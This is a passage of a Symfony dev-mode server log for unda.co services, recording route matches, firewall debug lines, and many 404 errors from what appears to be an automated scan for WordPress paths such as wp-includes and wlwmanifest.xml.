  133. [2025-12-15 23:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/html-api/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/html-api/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  134. [2025-12-15 23:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/crystal/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/crystal/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  135. [2025-12-15 23:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/media/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/media/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  136. [2025-12-15 23:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/smilies/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/smilies/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  137. [2025-12-15 23:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/wlw/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/wlw/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  138. [2025-12-15 23:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/codemirror/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/codemirror/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  139. [2025-12-15 23:44:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/php-compat/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/php-compat/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  140. [2025-12-15 23:44:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/random_compat/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/random_compat/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  141. [2025-12-15 23:44:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  142. [2025-12-15 23:44:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/endpoints/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/endpoints/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  143. [2025-12-15 23:44:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  144. [2025-12-15 23:44:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/search/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/search/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  145. [2025-12-15 23:44:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/sitemaps/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/sitemaps/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  146. [2025-12-15 23:44:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/sitemaps/providers/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/sitemaps/providers/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  147. [2025-12-15 23:44:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/sodium_compat/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/sodium_compat/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  148. [2025-12-15 23:44:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/sodium_compat/src/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/sodium_compat/src/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  149. [2025-12-15 23:52:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  150. [2025-12-15 23:59:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  151. [2025-12-16 00:00:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a1269e","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/a1269e?panel=time","method":"GET"} []
  152. [2025-12-16 00:00:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  153. [2025-12-16 00:02:58] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  154. [2025-12-16 00:06:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb5734","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb5734?panel=logger","method":"GET"} []
  155. [2025-12-16 00:06:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  156. [2025-12-16 00:07:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=request","method":"GET"} []
  157. [2025-12-16 00:07:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  158. [2025-12-16 00:09:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465a2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/465a2b","method":"GET"} []
  159. [2025-12-16 00:09:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  160. [2025-12-16 00:12:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  161. [2025-12-16 00:15:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fee13f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fee13f","method":"GET"} []
  162. [2025-12-16 00:15:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  163. [2025-12-16 00:22:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c1cb44","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c1cb44?panel=time","method":"GET"} []
  164. [2025-12-16 00:22:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  165. [2025-12-16 00:26:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/js/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/js/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  166. [2025-12-16 00:32:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  167. [2025-12-16 00:32:35] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  168. [2025-12-16 00:32:35] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  169. [2025-12-16 00:32:35] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  170. [2025-12-16 00:32:35] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  171. [2025-12-16 00:32:35] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  172. [2025-12-16 00:32:35] security.DEBUG: Calling Authentication entry point. [] []
  173. [2025-12-16 00:42:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=exception","method":"GET"} []
  174. [2025-12-16 00:42:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  175. [2025-12-16 00:43:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/js/'+link+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/js/'+link+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  176. [2025-12-16 00:46:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  177. [2025-12-16 00:47:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  178. [2025-12-16 00:47:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  179. [2025-12-16 00:47:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  180. [2025-12-16 00:47:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //blog/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //blog/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  181. [2025-12-16 00:47:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //web/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //web/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  182. [2025-12-16 00:47:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wordpress/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wordpress/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  183. [2025-12-16 00:47:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //website/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //website/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  184. [2025-12-16 00:47:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  185. [2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //news/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //news/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  186. [2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2018/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2018/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  187. [2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2019/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2019/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  188. [2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //shop/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //shop/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  189. [2025-12-16 00:47:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp1/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp1/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
